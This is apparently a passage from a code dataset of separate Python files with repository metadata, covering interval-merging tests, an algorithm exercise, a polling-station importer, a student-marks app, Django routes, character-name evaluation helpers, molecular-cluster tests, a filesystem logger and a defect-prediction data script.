['[1,5)', '(2,4]', '[5,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,6]]')\n\n def test_mergeOverlapping_4(self):\n a = ['[1,5)', '(5,7]', '(7,10]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,5), (5,10]]')\n\n # insert test \n\n def test_insert_1(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[2,5]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,9]]')\n\n\n def test_insert_2(self):\n a = ['[1,2]', '(3,5)', '[6,7)', '(8,10]', '[12,16]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[4,9]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,2], (3,10], [12,16]]')\n\n def test_insert_3(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[4,5]')\n c = interval.insert(lst, 
b)\n self.assertEqual(str(c), '[[1,9]]')\n\n def test_insert_3(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('(4,5]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,3], (4,9]]')\n\n def test_insert_4(self):\n a = ['[1,2)', '(2,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('(3,10]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,2), (2,10]]')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"clickpn/assignment6","sub_path":"sy1743/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7190804188","text":"# 4408. 자기 방으로 돌아가기\n\nT = int(input())\nfor test in range(T):\n N = int(input())\n arr = []\n rooms = [0] * 201 # 방 개수 200개(홀짝을 고려하기 힘드므로 합쳐줄 것)\n for i in range(N):\n x, y = map(int, input().split())\n x = (x+1)//2 # (1,2) (3,4) ~~~ (399,400)을 짝을 짓기 위해\n y = (y+1)//2\n arr.append((x, y))\n\n for x, y in arr:\n if x > y: # x가 큰 경우\n x, y = y, x # 스왑\n for i in range(x, y+1): # x~y까지 방에 모두 +1\n rooms[i] += 1\n\n print('#{} {}'.format(test+1, max(rooms))) # rooms의 최대값이 걸린 시간 단위임","repo_name":"Yookaser/Algorithm","sub_path":"SWEA/D4/swea4408.py","file_name":"swea4408.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6509384216","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"MEL\"\n addresses_name = (\n \"2023-05-04/2023-05-03T13:04:51.058305/Democracy_Club__04May2023.tsv\"\n )\n stations_name = (\n \"2023-05-04/2023-05-03T13:04:51.058305/Democracy_Club__04May2023.tsv\"\n )\n elections = [\"2023-05-04\"]\n csv_delimiter = \"\\t\"\n\n def address_record_to_dict(self, record):\n uprn = record.property_urn.strip().lstrip(\"0\")\n if uprn in [\n \"10002082195\", # 1 POTTER HILL, NOTTINGHAM ROAD, MELTON MOWBRAY\n ]:\n return None\n if record.addressline6 in [\n # split\n \"NG32 1QG\",\n \"LE14 2XB\",\n \"NG32 1QQ\",\n # not sure\n \"LE14 4SS\",\n \"LE14 4SR\",\n ]:\n return None\n\n return super().address_record_to_dict(record)\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_importers/management/commands/import_melton.py","file_name":"import_melton.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"71134725905","text":"student_list = []\r\n\r\ndef create_student():\r\n #Ask user for the student name and marks\r\n student_name = input(\"Enter your name: \")\r\n # create a dict in the format {'name':student_name, 'marks': []}\r\n student = {'name':student_name,\r\n 'marks': []}\r\n # return the dictionary\r\n return student\r\n\r\ndef add_marks(student, mark):\r\n #add a mark to the student dictionary\r\n student[\"marks\"].append(mark)\r\n\r\ndef calc_avg_mark(student):\r\n #check len of students marks\r\n number = len(student['marks'])\r\n if number == 0:\r\n return 0\r\n #calculate the average\r\n total = sum(student['marks'])\r\n return total/number\r\n\r\ndef student_details(student):\r\n #print out the string that tells the user the info abouth the student\r\n print(f\"The name of the student is {student['name']}, scores are 
{student['marks']}\"\r\n f\" and the average mark is {calc_avg_mark(student)}\")\r\n\r\ndef print_all_students(students):\r\n # print out the string that tells the user the info abouth the student for every student in the list\r\n for i, student in enumerate(students):\r\n print(f\"ID : {i}\")\r\n print(student_details(student))\r\n\r\n\r\ndef menu():\r\n #add a student to a student list\r\n #add a mark to a student\r\n #Print a list of students\r\n #Exit the application\r\n selection = input(\"Enter 'p' to print the list of all students,\"\r\n \" 's' to add a new student,\"\r\n \" 'm' to add marks for the student,\"\r\n \" 'q' to exit\"\r\n \"\\nEnter your selection: ...\")\r\n while selection != 'q':\r\n if selection == 'p':\r\n print_all_students(student_list)\r\n print(\"No students in the list\")\r\n elif selection == 's':\r\n student_list.append(create_student())\r\n elif selection == 'm':\r\n student_id = int(input(\"Enter the student ID to a mark to: \"))\r\n student = student_list[student_id]\r\n new_mark = int(input(\"Enter a new mark to be added: \"))\r\n add_marks(student, new_mark)\r\n\r\n selection = input(\"Enter 'p' to print the list of all students,\"\r\n \" 's' to add a new student,\"\r\n \" 'm' to add marks for the student,\"\r\n \" 'q' to exit\"\r\n \"\\nEnter your selection: ...\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmenu()","repo_name":"Likh-Alex/PostgreSQL-Python","sub_path":"registration_app.py","file_name":"registration_app.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24469669634","text":"from django.urls import path\n\nfrom apps.post.views import (\n HomeView,\n PostCreateView,\n PostDeleteView,\n PostEditView,\n SinglePostView,\n)\n\napp_name = 'post'\nurlpatterns = [\n path('', HomeView.as_view(), name='home'),\n path('post/create/', PostCreateView.as_view(), name='create_post'),\n path('post//delete/', PostDeleteView.as_view(), name='delete_post'),\n path('post//edit/', PostEditView.as_view(), name='edit_post'),\n path('post//', SinglePostView.as_view(), name='single_post'),\n]\n","repo_name":"GorbatovNikolay/DjangoProject","sub_path":"src/urls/post_urls.py","file_name":"post_urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21334603605","text":"from calendar import c\nfrom misc import open_dict\nimport numpy as np\nimport re\n\ntitles = ['mr', 'mrs', 'mr.', 'mrs.', 'miss', 'sir', 'aunt', 'uncle', 'lady', 'ms.', 'doctor.', 'doctor', 'dr.', 'general', 'rev.', 'reverend']\nmaleTitles = ['mr', 'mr.', 'sir', 'uncle', 'doctor.', 'doctor', 'dr.', 'general', 'rev.', 'reverend']\n\n# from self import remove_title, get_first_name, remove_mr, remove_first_name, get_last_three_words, remove_middle_name\n\ndef score_output(charChains, y_pred, outputChains): \n \n # y_pred = process_predictions(y_pred, outputChains)\n\n predictions = np.zeros((y_pred.shape[0], len(charChains)))\n\n TP = 0\n FP = 0\n FN = 0\n\n for i, (prediction, outputChain) in enumerate(zip(y_pred, outputChains)):\n if prediction == 1:\n\n found = False\n\n canonicalCharName = str(outputChain[0])\n\n if len(canonicalCharName) > 3:\n if canonicalCharName[-3:] == \" 's\":\n canonicalCharName = canonicalCharName[:-3]\n\n for j, groundTruthChar in enumerate(charChains):\n for charVariation in groundTruthChar:\n if charVariation.lower().strip() == canonicalCharName.lower().strip():\n 
predictions[i,j] += 1\n found = True\n break\n\n if found:\n break\n\n votes = np.sum(predictions, axis = 0)\n finds = np.sum(predictions, axis = 1)\n\n for k, vote in enumerate(votes):\n if vote == 0:\n FN += 1\n elif vote > 0:\n TP += 1\n FP += (vote - 1)\n\n for k, find in enumerate(finds):\n if y_pred[k] == 1:\n if find == 0:\n FP += 1\n\n ## check for errors\n if FP + TP != sum(y_pred):\n print('error 1')\n\n if FN + TP != len(charChains):\n print('error 2')\n\n ##\n if np.sum(y_pred) == 0:\n accuracy = 0\n else:\n accuracy = TP / np.sum(y_pred)\n\n if TP == 0:\n recall = 0\n precision = 0\n f1 = 0\n else:\n recall = TP / (TP + FN)\n precision = TP / (TP + FP)\n f1 = 2 * ((precision * recall) / (precision + recall))\n\n\n return accuracy, recall, precision, f1, finds, votes\n \n\ndef process_predictions(y_pred, outputChains):\n for i, (prediction, outputChain) in enumerate(zip(y_pred, outputChains)):\n if prediction == 1:\n if outputChain[0] == None or outputChain[0].strip() == \"'s\":\n y_pred[i] = 0.\n\n return y_pred\n\n\ndef combine_corefs(corefsDir, fileNames):\n '''\n Returns list of all the coref chains for a set of stories.\n '''\n fileName = fileNames[0]\n corefs = open_dict(corefsDir + fileName + '.p')\n refsAll = get_ref_exps_from_coref_dict(corefs)\n\n for i in range(1, len(fileNames)):\n fileName = fileNames[i]\n corefs = open_dict(corefsDir + fileName + '.p')\n refs = get_ref_exps_from_coref_dict(corefs)\n\n for ref in refs:\n refsAll.append(ref)\n\n return refsAll\n\ndef get_ref_exps_from_coref_dict(corefs):\n '''\n Takes coref dict. \n Returns lists of referring expressions, corresponsing to each CR chain. \n The first item in each list corresponds to the coref chain 'title'\n '''\n refExps = []\n\n for chain in corefs['clusters']:\n refs = []\n refs.append(chain['name'])\n\n for mention in chain['mentions']:\n refs.append(mention['text'])\n\n refExps.append(refs)\n \n return refExps\n\n\ndef get_all_variations_catchall(characterList):\n\n variationsList = []\n\n for character in characterList:\n\n l = [character]\n\n characters = separate_character(character)\n\n l = [character]\n\n for char in characters:\n l += get_variations(char)\n\n variationsList.append(l)\n\n return variationsList\n\n\ndef get_all_variations(characterList):\n\n variationsList = []\n\n for character in characterList:\n\n characters = separate_character(character)\n\n for char in characters:\n variationsList.append(get_variations(char))\n\n return variationsList\n\ndef get_variations(character):\n\n character = character.strip()\n\n variations = [character]\n\n # remove brackets / quoted from character. 
Add what#s within brackets / quotes to variations\n if remove_brackets(character) != character:\n variations.append(get_text_from_within_brackets(character).replace('\"','').replace('“','').replace('”',''))\n variations = iterate_through_var_functions(get_text_from_within_brackets(character), variations)\n character = remove_brackets(character).strip()\n if character == '':\n return variations\n variations.append(character)\n\n if remove_quoted(character) != character:\n variations.append(get_text_within_quoted(character))\n variations = iterate_through_var_functions(get_text_within_quoted(character), variations)\n character = remove_quoted(character).strip()\n if character == '':\n return variations\n variations.append(character)\n\n\n variations = iterate_through_var_functions(character, variations)\n\n for varNum, var in enumerate(variations):\n variations[varNum] = remove_lonely_brackets(var).strip()\n\n for i in range(len(variations) -1, -1, -1):\n if variations[i].replace('\\n','') != variations[i]:\n variations.append(variations[i].replace('\\n',''))\n \n return variations\n\n\ndef separate_character(character):\n '''\n takes in character ( \"Mr and Mrs Dark\", \"Pip\", \"Billy, Andy and John\")\n returns list of all the characters there. might be length 1\n '''\n\n if not ', ' in character:\n return (separate_ands(character))\n\n return separated_by_comma(character)\n \n\ndef remove_letters(character, letters):\n return character.replace(letters, '')\n \n\ndef remove_title(character):\n '''\n assumes form 'Mr John Clarke'\n returns 'John Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in titles and len(splits) > 2:\n return ' '.join(splits[1:])\n\n else:\n return character\n \ndef remove_title_keep_first_name(character):\n '''\n assumes form 'Mr John Clarke'\n returns 'John Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in titles and len(splits) > 2:\n return ' '.join([splits[0], splits[1]])\n\n else:\n return character\n \n\ndef get_text_from_within_brackets(character):\n '''\n assume no ands in character.\n returns text from within brackets. 
If not brackets are present, returns original character text.\n '''\n res = re.findall(r'\\(.*?\\)', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('(','').replace(')','')\n\n\ndef get_first_name(character):\n '''\n assumes character is made up of first name + last\n Removes surname\n '''\n\n if character.split(' ')[0].lower() in titles or len(character.split(' ')) != 2:\n return character\n\n if character.split(' ')[0].lower() == 'the':\n return character\n\n return character.split(' ')[0].strip()\n\n\n\n\ndef separate_ands(character):\n '''\n Assumes input of form 'Mr and Mrs Darcy' or 'James and Joan Clarke'\n Returns [Mr Darcy, Mrs Darcy], [James Clarke, Joan Clark]\n If not in assumed form, returns character\n '''\n splitsComma = character.split(', ')\n if len(splitsComma) > 1:\n return([character])\n\n\n splitsAnd = character.split(' and ')\n if len(splitsAnd) != 2:\n return([character])\n\n # Mr and Mrs James Brown -> Mr James Brown, Mrs James Brown\n\n if len(splitsAnd[0].split(' ')) == 1 and len(splitsAnd[1].split(' ')) == 1:\n return [splitsAnd[0], splitsAnd[0]]\n\n if len(splitsAnd[0].split(' ')) == 1 and len(splitsAnd[1].split(' ')) > 1:\n return [ ' '.join([splitsAnd[0], ' '.join(splitsAnd[1].split(' ')[1:])]) , splitsAnd[1] ]\n\n else:\n return [splitsAnd[0], splitsAnd[0]]\n\ndef remove_mr(character):\n '''\n assumes form 'Mr John Clarke or Mr Clarke'\n returns 'Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in maleTitles and \"'\" not in splits[1]:\n return splits[-1]\n\n else:\n return character\n\ndef separated_by_comma(character):\n '''\n assumes form: 'X, Y and Z' or 'X, Y, and Z'\n \n \n '''\n splits = character.split(',')\n chars = []\n\n\n if len(splits) == 1:\n return [character]\n\n if len(splits) == 2:\n containsAnd = False\n for split in splits:\n if ' and ' in split:\n containsAnd = True\n\n if not containsAnd:\n return [character]\n\n if ' and ' in character:\n splitsNew = []\n for s in splits:\n ss = s.split(' and ')\n for a in ss:\n if a != '':\n splitsNew.append(a.strip())\n\n splits = splitsNew\n\n addSurname = True\n for i, s in enumerate(splits):\n \n if i < len(splits) - 1:\n if len(s.split(' ')) != 1:\n addSurname = False\n break\n \n if i == len(splits) - 1:\n if len(s.split(' ')) != 2:\n addSurname = False\n break\n\n for i, s in enumerate(splits):\n if i < len(splits) - 1:\n if not addSurname:\n chars.append(s)\n else:\n chars.append(' '.join([s, splits[len(splits) - 1].split(' ')[-1]]))\n else:\n chars.append(s)\n\n return chars\n\n\ndef remove_first_name(character):\n '''\n Mrs. John Sedley -> Mrs. Sedley\n Mr. John Sedley -> Mr. 
Sedley\n '''\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n if splits[0].lower() in titles and len(splits) == 3:\n return ' '.join([splits[0], splits[-1]])\n\n else:\n return character\n\ndef remove_brackets(character):\n\n return re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", character).strip().replace(' ',' ')\n\n\ndef remove_quoted(character):\n\n if '“' in character: \n return re.sub(r'“.*”',\"\",character).strip().replace(' ',' ')\n \n if '\"' in character: \n return re.sub(r'\".*\"',\"\",character).strip().replace(' ',' ')\n\n else:\n return character\n\n\ndef get_text_within_quoted(character):\n\n if '“' in character:\n res = re.findall(r'\\“.*?\\”', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('“','').replace('”','')\n\n if '\"' in character:\n res = re.findall(r'\\\".*?\\\"', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('\"','')\n else:\n return character\n\ndef remove_middle_name(character):\n\n splits = character.split(' ')\n\n if len(splits) == 3:\n return ' '.join([character.split(' ')[0], character.split(' ')[-1]])\n\n return character\n\n\ndef get_last_three_words(character):\n\n splits = character.split(' ')\n \n if len(splits) > 2:\n return ' '.join(character.split(' ')[-2:])\n\n return character\n\ndef desc_comma(character):\n\n splits = character.split(', ')\n\n if len(splits) != 2:\n return character\n\n return splits[0], splits[-1]\n\ndef remove_lonely_brackets(variation):\n if '(' in variation and ')' not in variation:\n variation = variation.replace('(','')\n\n elif ')' in variation and '(' not in variation:\n variation = variation.replace(')','')\n\n return variation\n\n\ndef iterate_through_var_functions(character, variations, varFunctions = [remove_title, get_first_name, remove_mr, remove_first_name, get_last_three_words, remove_middle_name, remove_title_keep_first_name]):\n for function in varFunctions:\n\n if character != function(character):\n variations.append(function(character))\n\n\n if character != remove_title(character):\n for function in varFunctions:\n if remove_title(character) != function(remove_title(character)):\n variations.append(function(remove_title(character)))\n\n if character != desc_comma(character):\n variations += desc_comma(character)\n\n # get rid of commas / apostrophes; add to variations\n if character != character.replace(\"'\",' '):\n variations.append(character.replace(\"'\",' '))\n\n if character != character.replace('.',''):\n variations.append(character.replace('.',''))\n\n return variations\n\n\n# def get_canon_name_variations(character, varFunctions = [remove_apostrophe, ]):\n# character = character.strip()\n# variations = [character]\n\n# if remove_brackets(character) != character:\n# variations.append(get_text_from_within_brackets(character).replace('\"','').replace('“','').replace('”',''))\n# variations = iterate_through_var_functions(get_text_from_within_brackets(character), variations)\n# character = remove_brackets(character).strip()\n# if character == '':\n# return variations\n# variations.append(character)\n\n","repo_name":"grace-stoddart/character_extraction","sub_path":"src/eval_functions.py","file_name":"eval_functions.py","file_ext":"py","file_size_in_byte":13884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31298097443","text":"from pytest import approx\nimport 
MDAnalysis as mda\nfrom clustercode.ClusterEnsemble import ClusterEnsemble\nimport os\nimport copy\n\n# These files comprise the same trajectory but processed with different\n# gmx trjconv -pbc options (cluster, atom, whole and mol). The trajectory\n# includes a large single micelles, in parts split across multiple pbc.\n# It's a superset (of a trajectory) of the pbc_problematic labelled ones.\ntpr = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"topol_no_solv.tpr\")\natom = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_atom.xtc\")\nmol = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_mol.xtc\")\ncluster = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_cluster.xtc\")\nwhole = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_whole.xtc\")\n\n# The accompanying ClusterEnsemble objects\natom_uni = ClusterEnsemble(tpr, atom, [\"C1\", \"C2\", \"C3\", \"C4\"])\nmol_uni = ClusterEnsemble(tpr, mol, [\"C1\", \"C2\", \"C3\", \"C4\"])\nwhole_uni = ClusterEnsemble(tpr, whole, [\"C1\", \"C2\", \"C3\", \"C4\"])\nclstr_uni = ClusterEnsemble(tpr, cluster, [\"C1\", \"C2\", \"C3\", \"C4\"])\n\nwork_in = \"Residue\" # atom, Residue\nmeasure = \"b2b\" # b2b (bead to bead), COM, COG\npbc = True\n\nmol_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\nwhole_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\nclstr_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\natom_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\n\natom_list, whole_list, clstr_list, mol_list = [], [], [], []\n\n\ndef condens(uni, this_list, pbc):\n method = \"pkdtree\" # bruteforce, nsgrid, pkdtree\n for clusters in uni.cluster_list:\n for cluster in clusters:\n this_list.append(\n uni.condensed_ions(\n cluster, \"SU\", \"NA\", [4.4, 7.6], method=method, pbc=pbc\n )\n )\n\n\ncondens(atom_uni, atom_list, pbc)\ncondens(mol_uni, mol_list, pbc)\ncondens(whole_uni, whole_list, pbc)\ncondens(clstr_uni, clstr_list, pbc)\n\n\nclass TestCondensation:\n def run_condensed_ions(self, uni):\n \"\"\"\n Check if pkdtree, nsgrid and bruteforce algorithm in neighbour\n search (in condensed_ions) all get the same result for the mol_iven\n trajectory.\n \"\"\"\n results = []\n\n for method in [\"pkdtree\", \"nsgrid\", \"bruteforce\"]:\n ci = []\n for clusters in uni.cluster_list:\n for cluster in clusters:\n ci.append(\n uni.condensed_ions(\n cluster, \"SU\", \"NA\", [4.4, 7.6], method=method, pbc=pbc\n )\n )\n results.append(copy.deepcopy(ci))\n\n for ti, mol_i, bi in zip(*results):\n for tii, mol_ii, bii in zip(ti, mol_i, bi):\n assert tii == approx(mol_ii)\n assert tii == approx(bii)\n assert mol_ii == approx(bii)\n\n def test_atom_uni(self):\n self.run_condensed_ions(atom_uni)\n\n def test_mol_uni(self):\n self.run_condensed_ions(mol_uni)\n\n def test_whole_uni(self):\n self.run_condensed_ions(whole_uni)\n\n def test_cluster_uni(self):\n self.run_condensed_ions(clstr_uni)\n\n def check_cond1_cond2(self, cond_1, cond_2):\n for cond_1i, cond_2i in zip(cond_1, cond_2):\n for cond_1ii, cond_2ii in zip(cond_1i, cond_2i):\n assert cond_1ii == approx(cond_2ii, abs=1)\n\n def test_atom_mol_uni(self):\n \"\"\"\n Test if atom and mol treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(atom_list, mol_list)\n\n def test_atom_whole_uni(self):\n \"\"\"\n Test if atom and whole treated trajectories are within 1\n condensed ion\n \"\"\"\n 
self.check_cond1_cond2(atom_list, whole_list)\n\n def test_atom_clstr_uni(self):\n \"\"\"\n Test if atom and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(atom_list, clstr_list)\n\n def test_mol_whole_uni(self):\n \"\"\"\n Test if mol and whole treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(mol_list, whole_list)\n\n def test_mol_clstr_uni(self):\n \"\"\"\n Test if mol and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(mol_list, clstr_list)\n\n def test_whole_clstr_uni(self):\n \"\"\"\n Test if whole and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(whole_list, clstr_list)","repo_name":"MatKie/clustercode","sub_path":"clustercode/tests/cluster/test_clstr_condensation.py","file_name":"test_clstr_condensation.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8529614565","text":"# -*- coding: utf8 -*-\n\n__author__ = 'sergey'\n\nimport sys\nfrom time import time\nfrom dedupsqlfs.log import logging, DEBUG_VERBOSE, IMPORTANT\n\nclass DDSFlogger(object):\n \"\"\"\n Loggin class with ability to skip any logging work\n \"\"\"\n\n\n _app = None\n\n\n _time_in = 0\n\n\n _filter_calls = None\n\n\n _logger = None\n\n\n def __init__(self, application, filter_calls=None):\n \"\"\"\n @param application:\n @type application: dedupsqlfs.fuse.dedupfs.DedupFS\n\n @param filter_calls:\n @type filter_calls: list|tuple|set|None\n \"\"\"\n self._app = application\n self._filter_calls = set()\n if type(filter_calls) in (list, tuple, set,):\n self._filter_calls += set(filter_calls)\n self._init()\n pass\n\n\n def getTimeIn(self):\n return self._time_in\n\n\n def addCallToFilter(self, call):\n \"\"\"\n Add function name to log filter\n @param call:\n @return:\n \"\"\"\n self._filter_calls.add(call)\n\n\n def isEnabledFor(self, level):\n return self._logger.isEnabledFor(level)\n\n def getEffectiveLevel(self):\n return self._logger.getEffectiveLevel()\n\n def setLevel(self, level):\n return self._logger.setLevel(level)\n\n\n def _init(self):\n self._logger = logging.getLogger(self._app.__class__.__name__)\n self._logger.setLevel(logging.ERROR)\n\n # By default - almos all disabled\n self.critical = self._log_critical\n self.error = self._log_error\n self.important = self._log_important\n self.warning = self._empty_log\n self.warn = self._empty_log\n self.note = self._empty_log\n self.info = self._empty_log\n self.debug = self._empty_log\n self.debugv = self._empty_log\n\n self.logCall = self._empty_log_call\n\n if self._app.getOption('memory_usage'):\n self._logger.setLevel(IMPORTANT)\n\n # Configure logging of messages to a file.\n if self._app.getOption(\"log_file\"):\n handler = logging.StreamHandler(open(self._app.getOption(\"log_file\"), 'a'))\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n self._logger.addHandler(handler)\n if not self._app.getOption(\"log_file_only\"):\n self._logger.addHandler(logging.StreamHandler(sys.stderr))\n # Convert verbosity argument to logging level?\n if self._app.getOption(\"verbosity\") > 0:\n if self._app.getOption(\"verbosity\") >= 1:\n self._logger.setLevel(logging.WARNING)\n self.warning = self._log_warning\n self.warn = self._log_warning\n self.note = self._log_note\n\n if self._app.getOption(\"verbosity\") >= 2:\n 
self._logger.setLevel(logging.INFO)\n self.info = self._log_info\n\n if self._app.getOption(\"verbosity\") >= 3:\n self._logger.setLevel(logging.DEBUG)\n self.debug = self._log_debug\n\n if self._app.getOption(\"verbosity\") >= 4:\n self._logger.setLevel(DEBUG_VERBOSE)\n self.debugv = self._log_debugv\n self.logCall = self._log_call\n return\n\n\n def resetVerbosityByLogLevel(self):\n \"\"\"\n Needed by `do` command and sub-actions\n \"\"\"\n curLevel = self.getEffectiveLevel()\n\n # By default - almos all disabled\n self.critical = self._log_critical\n self.error = self._log_error\n self.important = self._log_important\n self.warning = self._empty_log\n self.warn = self._empty_log\n self.note = self._empty_log\n self.info = self._empty_log\n self.debug = self._empty_log\n self.debugv = self._empty_log\n\n self.logCall = self._empty_log_call\n\n if curLevel <= logging.WARNING:\n self.warning = self._log_warning\n self.warn = self._log_warning\n self.note = self._log_note\n\n if curLevel <= logging.INFO:\n self.info = self._log_info\n\n if curLevel <= logging.DEBUG:\n self.debug = self._log_debug\n\n if curLevel <= DEBUG_VERBOSE:\n self.debugv = self._log_debugv\n self.logCall = self._log_call\n\n return\n\n def _empty_log_call(self, func, msg, *args):\n return\n\n\n def _empty_log(self, msg, *args):\n return\n\n\n def _log_call(self, func, msg, *args):\n begin_t = time()\n if not self._filter_calls or func in self._filter_calls:\n self._logger.debugv(\"%s %s\" % (func, msg,), *args)\n self._time_in += time() - begin_t\n\n\n def _log_critical(self, msg, *args):\n begin_t = time()\n self._logger.critical(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_error(self, msg, *args):\n begin_t = time()\n self._logger.error(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_important(self, msg, *args):\n begin_t = time()\n self._logger.important(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_warning(self, msg, *args):\n begin_t = time()\n self._logger.warning(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_note(self, msg, *args):\n begin_t = time()\n self._logger.note(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_info(self, msg, *args):\n begin_t = time()\n self._logger.info(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_debug(self, msg, *args):\n begin_t = time()\n self._logger.debug(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_debugv(self, msg, *args):\n begin_t = time()\n self._logger.debugv(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n\n pass\n","repo_name":"sergey-dryabzhinsky/dedupsqlfs","sub_path":"dedupsqlfs/fuse/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"13555796104","text":"import argparse\nimport os\nimport sys\nsys.path.insert(0, '../../lib/dataset')\nfrom dataset import SmellsOnlyDataset, MetricsOnlyDataset, MetricsAndSmellsDataset\n\ndef create(directory): \n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef check_type(value):\n ivalue = int(value)\n if ivalue < 0 or ivalue >= 3:\n raise argparse.ArgumentTypeError(\"%s is an invalid int value:\\n 0 - type smells\\n 1 - type metrics\\n 2 - type smells and metrics\" % value)\n return ivalue\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description=\"Smell-based Defect Prediction. 
Process Dataset.\")\n parser.add_argument('-t','--type', required = True, type = check_type, help=\"Type of dataset: 0 --- Metrics Only; 1 --- Smells Only; 2 --- Metrics and Smells.\")\n parser.add_argument('-d','--dataset', required = True, help=\"Path to the dataset.\") \n return vars(parser.parse_args())\n\ndef main(out_dir):\n arguments = get_arguments()\n if(arguments['type'] == 0):\n dataset = MetricsOnlyDataset(arguments['dataset'])\n out_dir = out_dir + \"metrics-only-dataset/\"\n elif(arguments['type'] == 1):\n dataset = SmellsOnlyDataset(arguments['dataset'])\n out_dir = out_dir + \"smells-only-dataset/\"\n elif(arguments['type'] == 2):\n dataset = MetricsAndSmellsDataset(arguments['dataset'])\n out_dir = out_dir + \"metrics-and-smells-dataset/\"\n else:\n raise ValueError(\"The type must be either 0, 1 or 2\")\n \n create(out_dir)\n print(\"Saving Train X\")\n dataset.get_train_x().to_csv(out_dir + \"train_x.csv\")\n\n print(\"Saving Test X\")\n dataset.get_test_x().to_csv(out_dir + \"test_x.csv\")\n \n print(\"Saving Train Y\")\n dataset.get_train_y().to_csv(out_dir + \"train_y.csv\")\n\n\n print(\"Saving Tests Y\")\n dataset.get_test_y().to_csv(out_dir + \"test_y.csv\")\n \n\nif __name__ == '__main__':\n out_dir = \"../out/\"\n create(out_dir)\n 